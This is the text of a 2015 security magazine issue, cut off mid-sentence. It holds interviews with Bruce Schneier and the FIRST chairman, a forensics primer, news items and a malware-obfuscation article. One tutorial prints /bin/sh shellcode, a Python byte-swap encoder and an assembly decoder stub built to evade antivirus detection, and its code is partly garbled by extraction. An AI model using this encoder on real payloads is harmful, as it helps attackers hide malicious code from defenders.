Vol.5 Issue 19 March. - April. 2015
Knowing Your Adversary - Implementing a Cyber Threat Intelligence Program Interview with Mr.Maarten Van Horenbeeck Chairman Of First.org
Interview with Mr. Bruce Schneier Security & Terrorism Expert
www.bluekaizen.org
Issue 17 | Securitykaizen Magazine | 5
Issue 17 | www.bluekaizen.org | 6
www.bluekaizen.org
Contents
Interviews 5 Interview with Mr. Bruce Schneier Security and Terrorism Expert 9 Interview with Mr.Maarten Van Horenbeeck Chairman Of First.org
Grey Hat
13 Custom Shellcode Encoders
Reviews 21
Malware and Hashing: Hiding Functionality Malware Review Neurevt bot Malware Analysis
25 Malware Review
Knowing Your Adversary - Implementing a Cyber Threat
Program 32 Intelligence intelligence Review
Issue 19 | Securitykaizen Magazine | 4
Digital Forensics
16 Computer Forensics in the Real World
New & News
19 Bluekaizen News
Best Practice 35 Operating SIEM Solution
www.bluekaizen.org
Editor’s Note
MagazineTeam Chairman & Editor-in-Chief Moataz Salah
In this issue, we will have two unique interviews . The first one with the security guru, Bruce Schneier, one of the most famous security figures. We interviewed Bruce about cryptography, privacy, Edward snowden and NSA Leaks and many other interesting stuff. the interview was so beneficial and i hope you will enjoy reading it as i enjoyed preparing it. The 2nd interview features Maarten Van Horenbeeck, the president of FIRST. we had an amazing opportunity to chat about FIRST membership, where most CERTs around the world are so keen to join, what are the benefits to be a FIRST member?, What are the different activities of FIRST?, Maarten gave us some tips and recommendations to mitigate an incident. I am so proud to have those two interviews in one issue. Also this quarter is full of activities, as mentioned in issue 18 we will have a special appearing in the Regional Cyber Security Summit in Oman organized by Oman CERT and Bluekaizen. We helped in promoting a new idea to the cyber security community in the region which is Arabic Cyber Security Products through the cyber innovation competition. In a few weeks, we were able to gather more than 14 projects . Most of them were promising, they were shortlisted to 4 projects that will give a pitch in the summit to win valuable prizes.Moreover, Bluekaizen is having a usual special appearing in GISEC in Dubai this April. GISEC is one of the biggest exhibition for security companies in the Middle East.
Another international appearing for Bluekaizen will be next June with the annual international conference of FIRST in Berlin. Bluekaizen will have an opportunity to show its magazine and activities to different government representatives and incident response members of FIRST.
Editor Mohamed H.Abdel Akher Contributors BK team Khaled Sakr Mohamed Gamal Abdelraouf Prof. James L. Antonakos Eng. May Medhat Harris D. Schwartz Ayman Hammouda Website Development Mariam Samy Marketing Coordinator Mahitab Ahmed Distribution Ahmed Mohamed Proofreading Jeff Compton Design Mohamed A.El-Maghraby
Security Kaizen is issued Bi-Monthly Reproduction in Whole or part without written permission is strictly prohibited ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG For Advertisement In Security Kaizen Magazine & www.bluekaizen.org Website E-mail info@bluekaizen.org Or Phone: +2 0100 267 5570 +971 5695 40127
Bluekaizen Founder Issue 17 | www.bluekaizen.org | 6
www.bluekaizen.org
Interviews
Mr. Bruce Schneier
Interview with Mr. Bruce Schneier
Security and Terrorism Expert
Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?
I’m Bruce Schneier. I work in the intersection of security, technology, and people. I do a lot of things, but the two important things right now is that I am the CTO of Resilient Systems, Inc., which sells incident management software. Basically, it’s a collaborative platform that allows incident response teams to coordinate their activities. Also, I just published a new book on surveillance and what to do about it. It is Liars and Outliers: The Hidden Battles to Collect Your Data and Control Your World. I’m also speaking at Gulf Information Security Expo & Conference (GISEC)happening at the Dubai World Trade Centre (DWTC) from26-28 April 2015
BK Team
WWW.Bluekaizen.org Issue 19 | Securitykaizen Magazine | 6
of surveillance absolutely. They can protect the contents of emails and messages as they go across the Internet. But they cannot protect the surveillance data that your cell phone constantly generates so that the cell network knows where you are.
What are the major problems we’re facing on the Internet today? I worry about many Internet problems. I worry about crime. I worry about government surveillance in both my own and other countries. I worry about corporate surveillance, which is rampant on the Internet.
How do you define security? I could write a book on that question alone. Stepping aside the philosophical discussions, good security is a combination of protection, detection, and response. We need all three, because none of them can do it all individually. We know this in the real world, but we are finally learning it in the IT world. The 1990s was the decade of protection. The 2000s was the decade of detection. And this is the decade of response. The goal, of course, is resilience. Good security is resilient.
What is cryptography? How can you see the importance of cryptography in securing the infrastructure of countries? Cryptography is a mathematical technology that is useful in some security applications. It’s important, but it’s just a piece of technology. Good security involves many technologies, and also people and process. So while it’s important, its value can easily be overstated.
Do you think that Cryptography can solve all the security issues? Of course not. That’s like asking if door locks can solve all security issues. Cryptography is part of the solution of those security issues that need cryptography. For example, cryptography can protect against some types
Mostly I worry about data: how it is generated, who has access to it, what they can do with it, how they store it, and how they dispose of it. Many of the problems on the Internet can be traced to all this data. This is the focus of the two things I have been working on. Data and Goliath looks at the world of surveillance. I examine both corporate and government surveillance: who does it, how they do it, and what they do with our data. Then I discuss the problems of surveillance and why privacy is an important value. And finally, I give both technical and political solutions to deal with both corporate and government surveillance, both domestic and foreign. My company, Resilient Systems, helps companies defend their data against attack by giving them tools to improve their incident response. Incident response is a vitally important and long neglected part of IT security, and I want to change that.
Do you think that security agencies can crack the Internet privacy tools like TOR for example? What we’ve learned from the Snowden NSA documents is that cryptography tools like PGP, Tor, ORT, and so on are security from the NSA, at least in bulk. They cannot break the cryptography in these tools. The NSA -- and other governments as well -- has many tools to get around cryptography, but they do not scale as well as intercepting and analysing unencrypted traffic. Issue 19 | www.bluekaizen.org | 7
do you see Edward Snowden’s leaks about NSA and the whole PRISM thing? The Snowden documents have given us an extraordinary and unprecedented window into the NSA’s activities. I think it’s important to understand that while the US has a larger intelligence budget than the rest of the world combined, they’re not made of magic. The NSA tools and techniques disclosed by Snowden are the same ones being used by China, Russia, and other countries. And technology democratizes. Today’s top-secret NSA programs are tomorrow’s PhD theses and the next day’s hacker tools. So while it may seem that the NSA is more advanced than everyone else, what we’re really seeing is a preview of what the hackers are going to do next year.
How do you see the future of cyberattacks especially in the Middle East region? The future of cyberattacks is going to look like the present, only more so. There will be criminal attacks around the world as long as personal data provides the ability to commit fraud, and intellectual property is worth stealing. Governments will continue to attack each other and their own citizens as long as there is value there. And hactivisists will continue to attack organizations for political purposes. I don’t see any of this changing, and I don’t see a lot of regional differences. As the Middle East catches up to the rest of the world in Internet infrastructure, they’ll see more and more of these sophisticated cyberattacks.
How can you see the Future of Security industry in The Middle East? As attacks get more sophisticated, defence must similarly get more sophisticated. There’s a bright future for the security industry in the Middle East, because with the exceptions of the banking and oil sectors the region has generally not had enough IT security. This is going to change. Resilient Systems opened a European office early this year, and we’re already seeing significant demand in the Middle East. I suspect that other Internet security companies are experiencing the same thing.
Issue 19 | Securitykaizen Magazine | 8
www.bluekaizen.org
Interviews
Interview with
Mr.Maarten Van Horenbeeck Chairman of First.org
Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?
BK Team
WWW.Bluekaizen.org Issue 19 | Securitykaizen Magazine | 10
I’m originally from Belgium, where my career in information security started over ten years ago, when I took up a job as a technical writer for the security website Securitywatch.com. The web site closed a year later, but I stayed on for eight years as a security engineer with its parent security company, Ubizen. After a number of different roles there, working on managed security services, security assessments and forensic investigations, I moved to Seattle, Washington where I joined Microsoft, as part of the team that addresses software vulnerabilities in theirproducts. After some time on Google’s security team, today, outside of my work for FIRST, I manage a security team at Amazon. My passion has always been understanding and investigating complex security attacks. I am very fortunate to have had numerous opportunities to investigate targeted attacks in my career so far.Not only are these investigations interesting and often unusual, but they are also a great learning experience. As adversaries are intelligent, and actively aim to identify weaknesses in the security controls we build, they continuously change tactics, and staying on top of these changes is an exciting endeavor.
WWW.First.org
Can you give us a brief overview about FIRST? What is its role, activities and initiates ? FIRST is an international association of computer security incident response teams. We are truly global, with over 300 member teams in 70 countries. Our goal is to enable our members to improve their response to security incidents by providing them with access to tools, best practices and a trusted community. We were founded in 1990, shortly after the Morris worm, one of the first internet worms to gain widespread attention. We organize events which allow for knowledge transfer between members, and support working groups between both members and nonmembers that want to collaborate on a technical incident response or security topic. In addition, we drive standards development, organize training and education efforts, and reach out to other communities on behalf of our members. Much of FIRST is driven by our membership, and we maintain our qualitystandards by making sure that any new member is vetted by at least two other member teams- ensuring they are able to productively contribute and work on incidents with other members.
FIRST also actively works to expand the community of incident response teams. When you deal with an incident, it’s important to be able to find a peer who has some amount of influence over the network which is attacking you. Just a year ago, we launched the FIRST Fellowship Programme, which offers CSIRT teams from across the world which may not have the means or experience to participate in our community, a gentler way in. Provided they have a basic level of maturity, and can show us the role they play in their local community, FIRST will help them, both financially and through training, to play a bigger part in the community and become a member. Another area where we want to grow is by expanding into different industries. While we have members across all major sectors, a year ago we realized that FIRST had few participants from the energy sector. We organized a symposium specifically focused on this sector in Washington DC, and invited a few members to come and presenttheir incident response challenges, as well as teach a course on incident response. We see connecting our members with other industries as an important goal of FIRST
What type of memberships exist in FIRST? Is it per individual or per organization ? FIRST membership is, in principle, organizational. Organizations can apply to become a member and will need to find two sponsors from the existing FIRST community to assess their level of capability against a checklist. If both teams agree that the organization would be a great fit for FIRST, its membership will be considered. FIRST does have another membership type, FIRST liaison membership, which is forrepresentatives of organizations other than incident response teamsthat have a legitimate interest in FIRST. We have a small number of liaison members at any given time and their applications also need to be supported by an existing member of the community.
What are the benefits for joining FIRST ? Teams that join FIRST gain a number of benefits, but I’ll focus on three specific ones. First of all, they gain access to a community of professionals who are dealing with very similar problems. We provide tools for communication, such as a wiki, e-mail lists and ways to quickly find contacts at other member organizations. Issue 19 | www.bluekaizen.org | 11
Second, we support and nurture working groups between members. These can take various forms: from discussion groups at conferences, to more structured working groups with a particular technical goal. This might range from creating better standardized methods for describing and coordinating security incidents, to real standard building efforts that may end up being external standards bodies. A great example of the latter that we’ve supported for quite some time now is the Common Vulnerability Scoring System (CVSS), which is a standard for describing the impact of security vulnerabilities. The FIRST group working is currently preparing the third iteration of the standard. Previous versions have been widely adopted by security vendors and vulnerability coordinators. Finally, we give members the opportunity to exchange experiences directly, through training sessions, conferences, and smaller events .Every yearwe have at the very least our annual conference on incident handling, a number of training sessions with regional partners, and a symposium - a smaller conference which is aimed at bringing incident response knowledge to the wider community - not just our members. In addition, FIRST members regularly organize smaller events which focus on getting members together and sharing best practice and experience.
Can you tell us more about FIRST annual conference ? The Annual FIRST Conference on Computer Security and Incident Handling takes place in June, and has travelled the world to bring together our members and their peer incident responders from government, industry and academia. The conference has previously taken place in Boston, Bangkok, Malta and Vienna. This year itwill be held 14th-19th June in Berlin, Germany. More information can be found here - https://www.first. org/conference/2015. Our conference focus this year is on unified security: how do we improve the future of incident response and make it a more integral part of business processes, and help us understand the security landscape. The FIRST Conference is a multi-track conference which focuses on the technical, process and even policy requirements of proper security incident handling. For example, in 2014, we had a keynote on how the FBI dealt with investigating the Boston marathon bombings, and sessions ranged froma panel on cybersecurity risk indicators, which governments can use to assess and improve the effectiveness of their cybersecurity Issue 19 | Securitykaizen Magazine | 12
to very technical talks on recent security issues, such as open DNS resolvers, status of the CVSS project, and how to process intelligence feeds. The conference is very informative and we aim to make it accessible to everyone involved in the incident response community, whether they approach the issue from a technical, or a people perspective. The conference is also a good opportunity for our members to find out more about FIRST’s activities and to generally catch up on things; we provide an update on the current year and a preview of the next year’s business plan, and there are plenty of opportunities for members to have side-meetings and group discussions. One of the most amazing things I have seen at a FIRST Conference is different CSIRT teams going out for drinks together, and actually getting out their laptops in the pub to improve the tools and technologies they use during investigations. It shows that we’re really not simply a conference or an association, but a community.
What are the objectives and plans for FIRST in 2015 ? Each year, we have a number of different focus areas, but for 2015the most important one is training and education. For a number of years, FIRST has partnered with organizations to deliver incident response training. Most recently, we organized a number of courses with the GÉANT Association, which represents the European research and education networks; we also worked with AfricaCERTto organize TRANSITS courses. TRANSITS is affordable, high quality training, mostly focused on the technical elements of the incident response process. In2015, FIRST will becontinuing to collaborate witha number of organizations involved in training and incident response to develop a comprehensive training curriculum for incident response teams. Our goal is to develop materials and events which are aimed at helping a “team” work well, rather than focusing on individual technical skills. This effort is ongoing, and we plan to make significant progress in a number of meetings throughout the course of the year, in particular at our annual conference. If our efforts are successful, then I think we can make a massive impact in professionalizing the way we respond to industry wide incidents- a core area of concern forour members.
Through your professional experience, what are the most famous cause of incidents ? Personally, I believe Stuxnet and Conficker were game changers. Since then, there has been a rapid growth in the types of scenarios that we as incident responders have to prepare forand it isn’t showing any signs of slowing down. In the case of Stuxnet, we saw the complexity of multiple zero day vulnerabilities embedded in a single piece of malware, and the complexity of having to deal with impacts on software which was not widely understood. Even though the malware was well distributed within the community, pools of local talent learned specific things about Stuxnet which were not known to others. It was a prime example of why we need more collaboration in our industry in order to be effective. There are few security teams with all the necessary skills to investigate and truly understand the impact of such an event. Conficker drove home that same point—a large group of people needed to be involved to contain the incident, and stop the worm from infecting new systems. In addition, we saw a number of new propagation vectors, and an adversary that adjusted tactics as the defenders responded. Some of the entities involved in the response were not necessarily security expertsorganizations such as national domain registries. The key in responding to an event like Conficker was communication, and not necessarily the technical challenge which the malware posed. However, not all cyber security problems are the result of technical complexity and scope. Very simple issues still cause tremendous amounts of grief. Recently, we’ve seen ever larger Distributed Denial of Service attacks. Most of those attacks could be significantly mitigated if more internet service providers and network operators deployed a standard known as BCP38, which was finalized as far back as May of 2008. Yet, this hasn’t happened, and sowe are still dealing with basic problems that are affecting even some of the largest providers.
If you were asked for a few tips, what are the main recommendations to mitigate an incident? Successful responseto an incident involves careful preparation. Has your organization developed runbooks for the work your team needs to do during an incident? Have you done table-top exercises for a few majorincidents, including those for which your team is not actively preparing, but which would have amajor impact onyour organization? Second, it’s great to know your partners. For most organizations it’s not reasonable to assume that your team can deal with every problem. Performing a basic forensic investigation of a hard drive is a very different skill to performing memory forensics, assessing the integrity of a router, or analyzing an exploit for a brand new vulnerability. Organizations need to take a closelook at their capabilities, understand where they may be lacking, and make sure they have enough friendly teams in the industry they can partner with to get the job done. This may include agreeing with another team that you can support them with one very technical method of investigation, and in return usingtheir help with another type. Or, it may mean contracting a security vendor to provide particular services. These types of agreements are not something you’d want to decide on during a major incident. Having a contact list available is invaluable, it’s too late to pull out the Yellow Pages when an incident hits. Finally, make sure your network is designed and improved in such a way that it already rules out some types of incidents happening—this allows your security team to focus on the issues where their expertise is really required. When your team is busy dealing with spam, banking Trojans or small DDoS attacks, they don’t have time to prepare and study the major attacks which may affect your organization next. It helps to have someone focus on assessing trends in security incidents, so you can assess how your organization would fare if it was affected by a similar issue.
Issue 19 | www.bluekaizen.org | 13
www.bluekaizen.org
Grey Hat
Custom Shellcode Encoders Introduction We all used Metasploit shellcode encoders like XOR encoder,shikata_ga_nai, and many others,these encoders are targets for most antiviruses to fingerprint as they used by most attackers, so what about writing your own encoders?.
Khaled Sakr
Information security engineer at security Meter Issue 19 | Securitykaizen Magazine | 14
In this article we will see how easy it is to write custom encoders, however writing an encoder which is not easily fingerprinted by antiviruses is the hard part.
Shellcode and Encoders
#!/usr/bin/python
Shellcode is the piece used as the payload in the exploitation of software vulnerabilities for example spawning a shell, nearly all metasploitshellcodes are fingerprinted by most antiviruses therefore we use encoders to encode the shellcode and try to obfuscate(hide) it from antiviruses. So instead of using for example the shellcode used for spawning a shell “/bins/sh” , the new shellcodewill be the [encodedshellcode+ a decoder stub] that decodes the encoded shellcode at runtime.
#Defining the shellcode which has length of 28 bytes shellcode=”\x31\xc0\x50\x68\x2f\x2f\x73\ x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\ x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\ x80” iflen(shellcode)%2==1: #if length of shellcode is odd append 0x90 shellcode =”\x90”+shellcode #defining an empty string variable which will hold our encoded shellcode encoded_shellcode=”” #define an array x which will hold each byte of shellcode for example x[0]=cd , x[1]=c0 x=bytearray(shellcode) #the below part Perform the swap operation for i in range(0,len(shellcode),2):#for loop which will increase by 2 counts ncoded_shellcode+=’\\x’#insert ‘\x’ inside encoded shellcode
In this article we will write from scratch the both the encoder in python and then the decoder in assembly language. So the plan is 1.we will get ashellcode of “/bin/sh” 2.Encode the shellcode using any custom technique 3.Write a decoder stub that will take the encoded shellcode and decodes it at runtime 4.Generate the new shellcode (shellcode of decoder program)
Writing Encoder In this article I have chosen an Encoder which is simple and can be illustrated in the article which is the Swap Encoder the encoder takes every two bytes of the shellcode and swaps them together which at last gives some rubbish values of hex which don’t mean anything so imagine we have a shell code like this / xA2/xAA/xBF/xC3/x44/x1A/…….. , what will do is will swap each two bytes together.
temp=x[i]#store the every even byte in a Temp variable (x[i]=Temp),where i=0,2,3,… x[i]=x[i+1]#Make the swap between the two bytes old x[0]=\x31, new x[0]=\ xc0 encoded_shellcode+=’%02x’ %x[i]#Append the new value to the encoded shellcode ‘\xc0’ sert
encoded_shellcode+=’\\x’ ‘\x’ again
x[i+1]=temp operation completed
#in-
#now the swap
encoded_shellcode+=’%02x’ %x[i+1]#append the new value to the encoded shellcode
We will develop the Encoding using a Python script , the code will be self-explanatory.in the below example our original “/bin/sh” code is 28 bytes “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\ x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\ xc0\x40\xcd\x80”
#Exit the for code and print the encoded shellcode printencoded_shellcode
The output of the below script and our encoded shellcode is as below \xc0\x31\x68\x50\x2f\x2f\x68\x73\x2f\x68\x69\x62\x89\x6e\x89\xe3\x89\xc1\xb0\xc2\xcd\x0b\x31\x80\ x40\xc0\x80\xcd
Issue 19 | www.bluekaizen.org | 15
Jmp Call Pop Trick After writing the Encoder we have to write an assembly program which will take the encoded shell code as an input and add a decoder stub to decode it at run time, the shellcode of this assembly program is going to be the new shellcode that we are going to use. so the steps we are going to do is 1.Hardcode the encoded shellcode inside the an assembly script 2.Get the address of the encoded shellcode 3.Decode the encoded shellcode 4.Pass control to the decoded shellcode First we need to consider that the address of the encoded shellcode will be hardcoded inside the program as we don’t know where the address will be located in memory and it may differ with different computers So to solve this problem there is a technique called“jmp call pop”, the idea behind this trick is when a call instruction is excuted the address of the next instruction is pushed on the stack, if we defined our encoded shellcode to be the next instruction after the call instruction we can easily obtain it’s location by doing a pop operation on the stack, so let’s see this technique in action The program skeleton will look like below JmpGet_addr;;;;;;first when the program start it will jump to Get_addr;;;;; Decode: Pop esi ;;;; Finally it will pop the address of the encoded_shellcode inside esi register …. ….. …… Get_addr ;second it will call the call instruction sothe address of shellcode will be pushed to stack call Decode encoded_shellcode: db 0xc0,0x31,0x68,0x50,0x2f,0x2f,0x68,0x73,0x 2f,0x68,0x69,0x62,0x89,0x6e,0x89,0xe3,0x89 ,0xc1,0xb0,0xc2,0xcd,0x0b,0x31,0x80,0x40,0 xc0,0x80,0xcd
if you want to visualize this better you can run gdb,set a break point at pop esi instruction and examine the memory location where esi points to. x/28xb $esi is gdb command which examine 28 bytes at the memory location pointed by esi. As in the figure it points to our encoded shellcode /xc0/x31/x68 ……
Issue 19 | Securitykaizen Magazine | 16
Finally now we can write our decoder.
Writing decoder global _start;;;;; define program Entry Point;;;;;; section .text ;;;.text section where the code will exist;;; _start: jmp short Get_addr ;;;Jmp Call Pop Technique;;; decoder: popesi;;;Get the address of encoded shellcode inside esi xorecx,ecx;xorecx,ecx will put the value of zero inside ecx ;;since the shellcode length is 28 we will going to iterate 14 times to swap the position of the whole shellcode (ECX is our counter) mov cl,14 ;;;herelies the decode stub decode: xoreax,eax ;;;Make eax zero ;;;since in assembly we can’t make mov instruction between two memory location , we will use al and bl registers to temporary store each byte of the encoded shellcode,[esi] means the value which is pointed by esiregiser, where in the first iteration equals 0xc0. mov byte al,[esi] xorebx,ebx ;;;Make ebx zero mov byte bl,[esi+1] ;;;[esi] in first iteration is 0x31 mov byte [esi], bl ;; Exchange memory value [esi] with bl mov byte [esi+1],al;; Exchange memory value [esi+1] with bl ;;addesi by two counts to work on the next two shellcode values add esi,2 ;;decrementecx and go back to execute decode stub till swap is completed loop decode jmp short shellcode to the decoded shellcode
;;;Pass
control
Get_addr: ;;;Jmp Call Pop Technique call decoder shellcode: db 0xc0,0x31,0x68,0x50,0x 2f,0x2f,0x68,0x73,0x2f,0x68,0x69,0x62,0x89 ,0x6e,0x89,0xe3,0x89,0xc1,0xb0,0xc2,0xcd,0 x0b,0x31,0x80,0x40,0xc0,0x80,0xcd
www.bluekaizen.org
Digital Forensics
Computer Forensics in the Real World Nearly everyone is connectedto the Internet in some formor manner, by smart phone,tablet or laptop. With such connectivitycomes crime which brings theneed for investigators with a specificskill set to be able to investigate,track and apprehend criminals inthe digital world. This is where the exciting and ever changing worldof computer forensics begins. Asa computer forensic examiner youwill find yourself tracking child pornographers, cyber thieves and terrorists responding to the worst ofcrimes, all in an effort to deter andstop cybercrime. A very exciting fieldindeed! We’ll have a series of articles regarding the Computer forensics every issue to explain a complete picture of the topic.
Mohamed Gamal Abdelraouf Security Researcher Issue 19 | www.bluekaizen.org | 17
What Is Computer Forensics?
The importance of computer forensics:
The preservation, identification, extraction interpretation , and documentation of computer evidence, to include the rules of evidence, legal processes, integrity of evidence, factual reporting of the information found, and providing expert opinion in a court of law or other legal and/oradministrative proceeding as to what was found
Computer forensic investigation techniques are not only useful for solving cyber crimes such as computer hacking, but they also have helped to solve other crimes like murder, terrorism, organized crime, tax evasion, drug smuggling, extortion, and robbery cases . Computer crime is here to stay and is increasing rapidly. Cyber criminals are not just hackers looking for street credibility. Many of them are professionals motivated by financial gain and targeted espionage. The purpose of computer forensics techniques is to search, preserve and analyze information on computer systems to find potential evidence.
Evolution of computer forensics: •1984 Computer Analysis and Respond Team (CART) was developed to provide support to FBI field offices in the search of computer evidence. •1993 first international con ference on computer evidence was held. •1995 International Organization on Computer Evidence (IOCE) formed. •1998 International Forensic Science Symposium (IFSS) formed to provide forum for forensic. •2000 first FBI Regional Computer Forensic Laboratory was established.
Types of computer crimes : •Identity theft . •Hacking . •Computer virus . •Cyber stacking . •Credit card fraud . •Investment fraud . •Email bombing and spam . •Phishing and spoofing .
Issue 19 | Securitykaizen Magazine | 18
What do Computer Forensic Investigators look for? •Saved Files - These are data files that exist in a form that can be readily used. Usually they are well organized in proper directories. A good investigator will also look for files that are hidden in strange directories or even marked to be hidden from the operating system. •Deleted Files - When a file is deleted from a computer, it is not altered in the least. The operating system is just told to ignore that it exists. Unless the operating system writes new data over the old, it is easily recovered.
•Temporary Files - Operating systems and programs temporarily store a copy of working data in various places. Sometimes it is in the same location as the original. More frequently it is in a specially designated folder specifically for temporary files. The operating system also uses something called a swap file for its working files. While these are intended to be temporary, they can linger for the life of the computer.
of forensic computer examiners certify computer forensic examiners solely based on their knowledge and practical examination skills and abilities as they relate to the practice of digital forensics .
•Metadata - This is a term that refers to corollary information that is stored along with data. It includes such things as the date the file was created, modified and last accessed. It can tell us the original owner as well as everyone who has ever used it. Sometimes it contains previous versions of the document.
Is one of the most widely recognized non-tool certifications in computer forensics for current and former law enforcement personnel and you must be employed in law enforcement to qualify for regular IACIS membership 4– GCFA (GIAC Certified Forensic Analyst) from (GIAC) Global Information Assurance Certification. Focus on computer forensics in the context of investigation and incident response, and thus also focus on the skills and knowledge needed to collect and analyze data from Windows and Linux computer systems.
•Disk Slack - This is the most technically challenging. Sometimes when data is stored, it accidentally captures data from previous documents. With the right software, this can be searched and the old data resurrected
IT Knowledge Perquisite For this area the following knowledge it’s a must. I’m correlating the corresponding certifications that might help later in order to validate your knowledge to future employers. • Networking (Network+) • Computer Systems (A+) • Windows and Linux Operating Systems • Security (Security+) • Windows and Linux Systems Administration • Cybercrime Now let’s talk about the most certifications in Computer Forensics field: 1-CHFI(Computer Hacking Forensic Investigator) from EC-Council. Computer hacking forensic investigation is the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks. 2 - CCE (Certified Computer Examiner) from (ISFCE) The International Society of Forensic Computer Examiners . Professionalize and further the field and science of computer forensics Provide a fair, vendor neutral, uncompromised process for certifying the competency
3- CFCE (Certified Forensic Computer Examiner) from (IACIS) International Association of Computer Investigative Specialists.
5-PCI (Professional Certified Investigator ) The senior level computer investigations and forensics credential is known as ASIS International.
Conclusion: Computer forensics has become an important part of the litigation process, over the last few years Computer forensics is a vital part of the computer security process. As more knowledge is obtained about how crimes are committed with the use of computers, more forensic tools can be fine-tuned to gather evidence more efficiently and combat the crime wave on technology. In the next issue I will show how we start preparing for computing investigations
Issue 19 | www.bluekaizen.org | 19
www.bluekaizen.org
New & News
News A peek under the hood to the recent security breaches
Hacking Android Remotely Security researchers have warned of a pair of vulnerabilities in the Google Play Store that could allow cyber crooks to install and launch malicious applications remotely on Android devices. The vulnerability affects users running Android version 4.3 Jelly Bean and earlier versions of Android that no longer receive official security updates from Android security team for WebView, a core component used to render web pages on an Android device. Also, users who have installed third party browsers are affected. According to the researcher, the web browser in Android 4.3 and prior that are vulnerable to a Universal Cross-Site Scripting (UXSS) attack, and Google Play Store is vulnerable to a Cross-Site Scripting (XSS) flaw.
BK Team
WWW.Bluekaizen.org Issue 19 | Securitykaizen Magazine | 20
https://community.rapid7.com/community/metasploit/blog/2015/02/10/r72015-02-google-play-store-x-frame-options-xfo-gaps-enable-android-remotecode-execution-rce
Critical Ghost Vulnerability (CVE2015-0235) impacts Linux system
Deep Web Search Engine Memex Fights Crime
A very critical vulnerability affecting the GNU C Library (glibc) is threatening Linux servers for a remote command execution. This security bug was discovered by Qualys security researchers and will probably cause a lot of headaches to those who won’t update right away. The vulnerability could allow attackers to execute malicious code on servers and remotely gain control of Linux machines. It is a buffer overflow issue in glibc’s function __nss_hostname_digits_dots(), which is itself used by multiple others like gethostbyname() and gethostbyname2(). This is a critical issue as these functions are used in an enormous amount of software and server-level mechanisms. An attacker would need to send a very specific set of bytes to the function in order to trigger the bug and attempt to get command execution privileges on the victim’s server.
Obama’s executive order urges companies to share cyberthreat data
President Barack Obama signed an executive order on Friday that encourages and promotes sharing of information on cybersecurity threats within the private sector and between the private sector companies and the government agencies as well. In addition to making things more open, the executive order also calls for developing a set of standards for sharing information among companies; making it easier for organizations to form sharing agreements with the newly formed National Cybersecurity and Communications Integration Center (NCCIC). Obama also noted that major companies like Apple, Intel, and Bank of America have already signed on to the government’s new cyberthreat framework.
In 2014, the U.S. Defense Advance Research Projects Agency (DARPA) launched a the MEMEX project to design advanced search tools that could be also used to scan the deep web, which isn’t indexed by Google and other commercial search engines. for the first time, the security community has the opportunity to give a look to the MEMEX system,The Pentagon’s research agency gave Scientific American a preview of the software and 60 Minutes exclusive looks at the technology. The researchers explained that there is an impressive amount of data that is not considered useful for ordinary web users, but that represents a crucial source of information for law enforcement and intelligence agencies.
Newly discovered Android malware hijacks your phone
The AVG mobile security team recently discovered a malware known as Android/PowerOffHijack, hijacks the shutdown process and the device remains functional even though it appears to be off. The malware affects versions of Android older than v.5 (Lollipop) and requires root permission to hijack the shutdown process. After pressing the power button, the phone displays an authentic shutdown animation, and the phone appears off. Although the screen is black, it is still on. While the phone is in this state, the malware can make outgoing calls, take pictures and perform many other tasks without notifying you. Issue 19 | www.bluekaizen.org | 21
www.bluekaizen.org
Reviews
Malware Review
Malware and Hashing:
Hiding Functionality About The Author
Professor. James L. Antonakos Forensic Investigator at WhiteHat Forensics Issue 19 | Securitykaizen Magazine | 22
James L. Antonakos is a SUNY Distinguished Teaching Professor of Computer Science at Broome Community College, in Binghamton, NY, where he has taught since 1984. James teaches both in the classroom and online in classes covering electricity and electronics, computer networking, computer security and forensics, information management, and computer graphics and simulation. James is the designer and director of the new 2-year AAS Degree in Computer Security and Forensics at Broome Community College. James is also an IT security consultant for Excelsior College and an online instructor for Champlain College and Excelsior College. James has extensive industrial work experience as well in electronic manufacturing for both commercial and military products, particularly in flight control computer technology for Navy aircraft. James also consults with many local companies in the areas of computer networking and information security. James is the author or co-author of over 40 books on computers, networking, electronics, and technology. He is also A+, Network+, and Security+ certified by CompTIA and ACE certified in computer forensics by AccessData. James is a frequent presenter at the annual New York State Cyber Security Conference, the founder of WhiteHat Forensics, and an NCI Fellow for the National Cybersecurity Institute in Washington, DC.
Introduction There is no doubt that malware coders are very good programmers. The sophistication of modern malware and its capabilities proves this point easily. However, we must also acknowledge the creativity and imagination of the malware coders, as they employ techniques to disguise what they are doing from the prying eyes of the malware analyst, intrusion detection system, or anti-virus program scanning their code.
Figure 1 shows an example of this. Figure 1 is a flowchart illustrating the search activity showing how a function’s code address is obtained.
What are some of the goals of the malware coder? Consider the following: •Spread their malware to as many systems as possible. •Remain undetected. •Make sure the malware runs every time the system boots. •Extract valuable information from the infected system. •Enable remote access / control of the infected system. •Write the malware code in a way that disguises its functionality. In this article we will take a look at one way the malware functionality is disguised.
Windows DLLs The Windows operating system makes heavy use of Dynamic Link Libraries (DLLs). These are essentially pre-written subroutines that provide many different kinds of functionality, from file system navigation, to file manipulation, process creation, communication, and calls into the kernel of the operating system to do almost anything. DLLs are designed to be loaded into memory as needed and discarded from memory when no longer needed, as a way of managing memory. They evolved from the old days of scarce memory as a way to make the most out of limited RAM. Once a DLL is loaded into memory, the functions that it exports (makes available to external programs) are accessed using a method that involves searching through a list of exported function names until the desired function name is located. Then the memory address where the function code actually resides after the DLL has been loaded into RAM is read from a corresponding entry in a different table.
Figure 1: Accessing an exported DLL function
Strange PUSHes Anyone familiar with the organization of a run-time stack knows that many different kinds of things are pushed onto the stack when a function is called. Consider these instructions:
PUSH EAX CALL SUB_11C
When these instructions execute, this results in the run-time stack having a parameter (from PUSH EAX) and a return address (due to the CALL instruction) pushed onto it. Once we enter the subroutine code, EBP is also pushed and then reassigned to point to the base address of the stack frame.
Issue 19 | www.bluekaizen.org | 23
The stack frame now looks like this:
Remember that the malware coder wants to disguise the functionality of the malicious code. Could it be that the strange hex values PUSHed onto the stack have some relation to the DLL function names being utilized? Let’s keep that thought in mind as we look at an interesting subroutine located somewhere else in the malware.
An Even Stranger Subroutine
Figure 2: Run-time stack frame
So, within the subroutine that was called, an instruction like
